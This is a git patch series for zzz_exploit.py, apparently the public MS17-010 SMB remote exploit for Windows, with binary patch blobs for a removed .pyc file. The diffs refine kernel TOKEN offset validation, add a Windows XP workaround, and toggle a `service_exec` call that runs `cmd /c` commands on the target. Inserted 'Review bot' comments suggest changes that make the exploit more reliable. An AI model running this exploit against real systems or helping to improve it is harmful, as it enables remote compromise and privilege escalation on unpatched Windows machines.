zLmyf&2*tjoC$b+$cTc+3p2M3r@dS)`j8nwVxUQ-CfAVFg9TL4pV3t!4? zfw+jD$K&KpjNXJ3@J(+Ul3)lMin;I0nO*U$eCT+|t}3XASc2(d=MO>-iH3-RcH*)D zZ7R^OQ`!@Oz7)R+v6s;h=orZqi?X`iyHVXFi5fWZ(DpQoGboffNT}Y9J%Be`{%sMs zUq(G3z&QJbRTGZj{BrQ~sOV=mh0*7~u9xFoKc& z;O#u7DvK`hZ`Xsc-dd*EYF1MGb~xVMYNPBgx5Iih^d+#cXYrN@yCp%y^@V(IdXtQm z6>AFoLZ|C1KM zilhSM0dr6W6XYdwR_-1u;#cC$is-PisI{d!qAsMxBrZY@wvI5( z8uIM#w>xTxVTG%(zQlN=xl#>Qq}mFlN~1&r?=DpvjT?v<>}!DZhKtYR&2Qq7RFH87 zof=pz$!n666CQ~=+-(ujIfen7NC^TNo2$Dgg$pj|KH5>V8whbyXfQ0E1tX43M~?Dg zk_W-a_qY?9TJxk%{?Fr`)S^cu54pd_Wq-N032a zc5O4)4?`+FlkmV#Q#GN*3vBek)UIln4C}+Ckkgk`yfg+mOMJDR$Ho@G^-RIq11Q9A z7guAxw$hes+!DPiwadp?BYlP8#b=e&vicy5J^*v)u3UEK=Pq0kzZd|{l+B_>;{?nE zxnzMO&DZkqg48>H?H1~(4`-*iFn0{Bi((VcEy`~9Mn~$J0DhM1V~>B%#%>e_$@G!j z9%rYslj(KTN1Ph%0<~XaAN~amB`Qk^AYkrsW5T9}5y+B&z@(1U_@%*VP$+KkmPWiG zjG9Eg4Q^%h3BPVzX)VvOaLopzxXv(q(uabez_EuZ^b$m>ynW${@i z>eD2%pWRN$8OR7(rHRbE6BoPu1PT+s-fk=E9CF3LN&SBqV8;Zx-jq`bkV)F(Q&D`Szf!&v-B zx9S+ycv*+Hgn8c0k@@c_hoO&p34O@xArpuz#=n($iZTxdVZ;s{F=#qDN889JO>+A~ z{PyTdUM3ikkO4D+rBRN>w-Mn^c2MMyLmV<7GKFK8xr^P%MbiXo6O|IxP1)W;DI|Ue zX*aU=)#&$S{3dswXMXNv%I(sgQ6`o9L(%SUUQi`(O5=D(gZN9V;W2vW@gi%YBxwWO zE?A0rFX16NKw@?*?UC@MTd6O%@M%xSpKn!fG<;9FpG3ANFgQ_h0b@Qz)o`$8eE3f)oy) zLF60*)s)2Y71cke;!aCp%REE7j#M1bmO;3|s73OBq`6Jv#U;}(S; zUPaVL!G~KBwJ7S)HBl=vWKj!-4A&xY-yqCde6$#bD}BP`OfhU2GXfUP0fPp1M+-Qi z4jMM=_ySTj524U-_+DU$&`OCYR}&_msmS*!B5Am@O>BjDHsVA8N;{!qkM9!ExvXJHOnyf8fCK+vq=05!C-I58^lE7?+EJpplPBw@{}Vy zTq|M#2PN9*FVNV+e=Ra4fpb!YFgi(`P-%-+AWS?*9V0=<1LLS6fY|6QXov^if}Wt( zh(^E}fGt6bG7fUUibpaIk^l-)p&Ky}Wqbg8-z?)QhLnE&>Wu8G0X{0mrotC_kP@e4 zgpW4%O8MNZy)NHSs@$d`N8BlGKgAkpD_TWFF8lGRP#n$)+&$=(4LutP{S>0YBWw^A zWQn7Xel=TEBm?ZmC<6f*fiKA)`jn$N2nKl}<_8gs698;SFpzE8!m3&kgCAgy)Pqo# zCzkA=vY2A=0gH`D=#ATXvXtAA^^Q)zm&bmX`CUdQ-OT@w<~MOAVw3q(XoT%=ll;HK z;#(-{c#QpB6p2-}zef-qb`{~@N9{3|l$@}IC7lVG(%5K9XC7lqpGIjvg)H*~Sy`Tm z?A|1K8G*Gr!;iFk6m1IkM{D=~5?lL;+dU?yQcW=P8j)5Iq@7Yd_cNOZY{++!TZu`= z=<(b0Z5X{rtMjLj13HcyJst zqo7i1Nl+QJqM$NrML}iMVo(VuJZiz7r9ol@qss`lP+idohH#UvV$?#$lpJQ 
zV>dM9%{t&4{=j2vvqdJ*5RlIBQoQ!J2^P0&iZ$_7zsuU=1COVWT_!gp*~K+mHhO!T zyn7to+lk)Pf=TQ~K96}_T-0*_Y{x}qtPsa;aE8|L|Iy*w4>7TtF|MaB{@=0o6sYXY zt7Z5o3LwVe7l=HyW^eq=nr$7yWuzx#%$N@RNgA^$tiM?xHk&hO#)p_QCNCJD@uC0n zp~YzbfXO~8b4C(u;O5kzt?}fMLCa$p^Y8pE=WL+@)Zh~IHvWRLmLgDj*;f#4Nljmfg{zWhU`iWN|Q2L1e2Y&V;i!S1x@Fz|3DJeuhmdQG0>KMHZiCafwBR#Wfa^ zvwWAe&$IAY_$=_~cV?A&``L?gypFqWSJ?x?82L=%{KZT2Zso$Pop^Vt-WMFcO zC-)!%ymEEEEMGm?4rd8ibXk0b#n)MUjm1|{AbEroY_$>inr{0(JAT08&saz(@>i_U zVY7e3;)g8$o&~wy{)ojtqDUzqwI}!@!M={ydE$V0?03dSih23zFZLDt#|rxjd*mtR zj~1eyv0bCP_7wBSo;_ALIC3!g{p#eag@eNf^CjNUi1ScyYT`z@3slul)MM~*eA0+- z6_4L~UB7>%#OPlO>-Ehi(AE!X2UvTV#W57}SJiMRqFeH;D^cVaGL{u(`OmB!yv%S-nE&aTfd^TphFesUB)W5dtx L0!J5ziv#})ezMr2 literal 0 HcmV?d00001 diff --git a/zzz_exploit.py b/zzz_exploit.py index e9f5996..41f81b8 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -867,15 +867,19 @@ def exploit(target, pipe_name): # copy Token data for restoration tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE']) - userAndGroupCount = unpack_from(' 4: + if userAndGroupCount > 4 or userAndGroupCount == 0: # check NULL too print("Bad TOKEN offsets detected, performing workaround") - userAndGroupCount = unpack_from(' Date: Mon, 29 Jan 2018 18:55:22 -0700 Subject: [PATCH 5/9] remove pyc again... needs a gitignore maybe --- mysmb.pyc | Bin 16693 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 mysmb.pyc 
diff --git a/mysmb.pyc b/mysmb.pyc deleted file mode 100644 index c72fbe7fd06d08f3ed4276e128df596f68984605..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 16693 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 L0!J5ziv#})ezMr2 From 8bd6f3760f76c1fdba0c46b07ef788b3cf425563 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 22:34:40 -0700 Subject: [PATCH 6/9] test restricted SID values instead of group count --- zzz_exploit.py | 69 ++++++++++++++++++++++++++++++++++++++------------ 1 file changed, 53 insertions(+), 16 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 41f81b8..5c6c2c7 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py 
@@ -867,21 +867,8 @@ def exploit(target, pipe_name): # copy Token data for restoration tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE']) - - userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET'] - userAndGroupCount = unpack_from(' 4 or userAndGroupCount == 0: # check NULL too - print("Bad TOKEN offsets detected, performing workaround") - userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'] - userAndGroupCount = unpack_from('= x + if RestrictedSids != 0 or RestrictedSidCount != 0: + print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!') + print('RestrictedSids: 0x{:x}'.format(RestrictedSids)) + print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount)) + success = False + + print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount)) + print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr)) + + return success, userAndGroupCount, userAndGroupsAddr + +def get_group_data_from_token(info, tokenData): + userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET'] + userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET'] + + # try with default offsets + success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset) + + # hack to fix XP SP0 and SP1 + # I will avoid over-engineering a more elegant solution and leave this as a hack, + # since XP SP0 and SP1 is the only edge case in a LOT of testing! + if not success and info['os'] == 'WINXP' and info['arch'] == 'x86': + print('Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround') + + userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'] + userAndGroupsAddrOffset = info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'] + + # try with hack offsets + success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset) + + # still no good. 
Abort because something is wrong + if not success: + print('Bad TOKEN_USER_GROUP offsets. Abort > BSOD') + sys.exit() + + # token parsed and validated + return userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset def smb_pwn(conn, arch): smbConn = conn.get_smbconnection() @@ -931,7 +967,7 @@ def smb_pwn(conn, arch): smbConn.disconnectTree(tid2) #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') - #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session # a simple method to get shell (but easily to be detected by AV) is # executing binary generated by "msfvenom -f exe-service ..." @@ -1008,3 +1044,4 @@ pipe_name = None if len(sys.argv) < 3 else sys.argv[2] exploit(target, pipe_name) print('Done') + From f611d0e5da62854284c1e5ec52b73643af20e436 Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Mon, 29 Jan 2018 22:36:36 -0700 Subject: [PATCH 7/9] comment out service_exec --- zzz_exploit.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 5c6c2c7..f363c9b 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -967,7 +967,7 @@ def smb_pwn(conn, arch): smbConn.disconnectTree(tid2) #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py') - service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') + #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt') # Note: there are many methods to get shell over SMB admin session # a simple method to get shell (but easily to be detected by AV) is # executing binary generated by "msfvenom -f exe-service ..." From 42af710431c9f48b3a9d1835e0b288fc46daec38 Mon Sep 17 00:00:00 2001 
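Review bot: The `@@ -931,7 +967,7 @@` hunk un-comments the `service_exec(...)` call in `smb_pwn`, which has nothing to do with this commit's subject ("test restricted SID values instead of group count") and is reverted verbatim in PATCH 7/9. Both changes should be squashed out so the history never contains a revision where the script creates and starts a service on the target by default; a reviewer bisecting later would otherwise land on that state. If the intent was a local test, a comment above the line naming it as opt-in, `# optional: uncomment to run a command via the SCM (leaves a service-creation event on the target)`, keeps the default inert. `smb_pwn` begins outside the hunk.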
From: zerosum0x0 Date: Mon, 29 Jan 2018 23:54:47 -0700 Subject: [PATCH 8/9] added additional 0 checks and struct notes --- zzz_exploit.py | 25 ++++++++++++++++++------- 1 file changed, 18 insertions(+), 7 deletions(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index f363c9b..3ea607f 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -908,18 +908,29 @@ def exploit(target, pipe_name): return True def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset): + # struct _TOKEN: + # ... + # ULONG UserAndGroupCount; // Ro: 4-Bytes + # ULONG RestrictedSidCount; // Ro: 4-Bytes + # ... + # PSID_AND_ATTRIBUTES UserAndGroups; // Wr: sizeof(void*) + # PSID_AND_ATTRIBUTES RestrictedSids; // Ro: sizeof(void*) + # ... - RestrictedSidCount = unpack_from('= x success = True - # RestrictedSids and RestrictedSidCount MUST be 0 - # Could also add a failure point here if userAndGroupCount >= x - if RestrictedSids != 0 or RestrictedSidCount != 0: + if RestrictedSidCount != 0 or RestrictedSids != 0 or userAndGroupCount == 0 or userAndGroupsAddr == 0: print('Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!') print('RestrictedSids: 0x{:x}'.format(RestrictedSids)) print('RestrictedSidCount: 0x{:x}'.format(RestrictedSidCount)) From 59de6a0e13653d57ea21d26b76388bc4204ae75b Mon Sep 17 00:00:00 2001 From: zerosum0x0 Date: Tue, 30 Jan 2018 00:27:48 -0700 Subject: [PATCH 9/9] small typo in doc --- zzz_exploit.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/zzz_exploit.py b/zzz_exploit.py index 3ea607f..2c49b3e 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -924,7 +924,7 @@ def validate_token_offset(info, tokenData, userAndGroupCountOffset, userAndGroup # RestrictedSids MUST be NULL # # userandGroupCount must NOT be 0 - # userandGroupAddr must NOT be NULL + # userandGroupsAddr must NOT be NULL # # Could also add a failure point here if userAndGroupCount >= x
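Review bot: The rewritten condition in `validate_token_offset` still has no upper bound on `userAndGroupCount`, which the comment immediately above it leaves open as `Could also add a failure point here if userAndGroupCount >= x`; a wrong offset that happens to land on a non-zero dword still passes, so adding `or userAndGroupCount > MAX_GROUPS` (with `MAX_GROUPS` a placeholder bound to be chosen from the tested targets) would make the sanity check reject mis-parsed tokens far more reliably. The `// Ro:` and `// Wr:` tags in the new `struct _TOKEN` comment are never defined; presumably they mark which fields the script only reads versus the one it overwrites, and a one-line legend such as `# Ro = read only for validation, Wr = written by the exploit` would remove the guesswork. The failure branch prints `RestrictedSids` and `RestrictedSidCount` but not which of the four tests failed; printing all four values inside the branch, or the failed predicate, would make the "Bad TOKEN_USER_GROUP offsets" message actionable. `validate_token_offset` continues past the last line of the hunk.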